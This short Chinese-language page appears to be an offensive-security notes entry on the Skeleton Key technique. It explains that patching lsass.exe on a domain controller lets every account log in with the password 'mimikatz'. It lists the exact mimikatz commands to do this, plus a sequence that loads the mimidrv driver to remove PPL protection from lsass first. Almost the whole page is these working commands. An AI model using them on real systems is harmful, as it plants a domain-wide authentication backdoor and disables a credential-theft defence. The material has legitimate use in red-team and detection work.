Skip to main content

Skeleton Key

Skeleton key是一种持久化技术,只适用于域控制器,通过补丁域控制器上的 lsass.exe 进程以劫持NTLM和Kerberos认证流程,以允许任何用户以一个相同的密码 mimikatz 进行认证,当然用户原本的密码依旧有效。

在域控制上运行mimikatz

privilege::debug

misc::skeleton

然后,我们可以用任何账户以及密码 mimikatz 进行认证了。

 

如果 lsass.exe 被PPL所保护,我们需要先载入 mimidrv 驱动

privilege::debug

!+

!processprotect /process:lsass.exe /remove

misc::skeleton

!-

Back to top